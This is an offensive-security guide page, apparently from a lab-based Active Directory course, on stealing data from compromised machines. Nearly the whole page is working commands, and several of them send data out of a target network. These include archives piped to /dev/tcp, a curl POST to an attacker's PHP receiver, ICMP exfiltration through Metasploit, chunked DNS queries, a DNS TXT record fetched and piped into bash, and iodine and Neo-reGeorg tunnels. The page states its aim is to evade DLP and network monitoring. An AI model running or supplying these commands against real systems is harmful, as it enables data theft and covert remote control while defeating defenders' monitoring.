09 / Data Exfiltration

Data Exfiltration

Extract sensitive data from compromised AD systems using covert channels — TCP, SSH, HTTP(S), ICMP and DNS — to avoid detection by DLP or network monitoring.

Data Exfiltration Techniques

Covert channels for extracting data from AD environments: TCP, SSH, HTTP POST, ICMP and DNS exfiltration, including DNS tunnelling with iodine.

DNSICMPHTTPSSH

soon

TCP Exfiltration

nc / tar / base64

1. Start listener on jump box

ssh jumpbox@jumpbox_ip
nc -lvp 8080 > /tmp/borrowed.data

2. On target — tar, base64, EBCDIC, send

tar zcf - files_and_folders/ | base64 | dd conv=ebcdic > /dev/tcp/jumpbox_ip/8080

3. On jump box — decode

dd conv=ascii if=borrowed.data | base64 -d > borrowed_data.tar
tar xvf borrowed_data.tar

SSH Exfiltration

tar over SSH

tar cf - files_and_folders/ | ssh jumpbox@jumpbox_ip "cd /tmp/; tar xpf -"

HTTP(S) Exfiltration

curl POST / PHP receiver

1. Setup PHP receiver on attacker web server

nano /tmp/contact.php
# content:
<?php
if (isset($_POST['file'])) {
  $file = fopen("/tmp/http.bs64","w");
  fwrite($file, $_POST['file']);
  fclose($file);
}
?>
php -S 0.0.0.0:80

2. From target — POST the data

curl --data "file=$(tar zcf - files_and_folders | base64)" http://webserver_ip/contact.php

3. On attacker — decode

sudo sed -i 's/ /+/g' /tmp/http.bs64
cat /tmp/http.bs64 | base64 -d | tar xvfz -

HTTP Tunnelling

Neo-reGeorg

git clone https://github.com/L-codes/Neo-reGeorg.git
cd Neo-reGeorg
python3 neoreg.py generate -k password
# upload tunnel.php to victim web server, then:
python3 neoreg.py -k password -u http://victim_webserver_ip/path_to/tunnel.php
# proxy opens on 127.0.0.1:1080 — use with curl or proxychains:
curl --socks5 127.0.0.1:1080 http://$TARGET_IP:80

ICMP Data Transfer & Command Execution

Metasploit / icmpdoor

ICMP data exfiltration via Metasploit

msfconsole
use auxiliary/server/icmp_exfil
set BPF_FILTER icmp and not src $ATTACKER_IP
set INTERFACE eth0
run
# on target — send trigger:
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "^BOFfile.txt"

ICMP command execution (icmpdoor)

# Attacker:
sudo icmpdoor -i eth0 -d $TARGET_IP
# Target:
sudo icmp-cnc -i eth1 -d $ATTACKER_IP

DNS Exfiltration

dig / TXT records

Setup — add DNS records on your server

# A-record:  attNS → $ATTACKER_IP
# NS-record: att  → attNS.$ATTACKER_DOMAIN

1. Start tcpdump on attacker

sudo tcpdump -i eth0 udp port 53 -v

2. From target — encode file and send via DNS queries

cat borrowed_file.txt | base64 | tr -d "\n" | fold -w18 | sed 's/.*/&./' | tr -d "\n" \
  | sed s/$/att.$ATTACKER_DOMAIN/ | awk '{print "dig +short " $1}' | bash

3. Decode received base64 string

echo "base64_string" | tr -d '.' | base64 -d

C2 via DNS TXT record

# Create script, base64-encode, add as TXT record: script.tunnel.com
dig +short -t TXT script.tunnel.com | tr -d "\"" | base64 -d | bash

DNS Tunnelling (TCP over DNS)

iodine

# 1. Attacker — start iodined
sudo iodined -f -c -P password $TARGET_IP/24 att.tunnel.com

# 2. Jump box — connect
sudo iodine -P password att.tunnel.com

# 3. Attacker — tcpdump to verify
sudo tcpdump -i eth udp port 53

# 4. Attacker — SSH through tunnel
sudo ssh thm@$TARGET_IP -4 -f -N -D 1080

# 5. Use via SOCKS proxy
curl --socks5 127.0.0.1:1080 http://page_you_want_to/access.php

← Pivoting Next: Cleanup →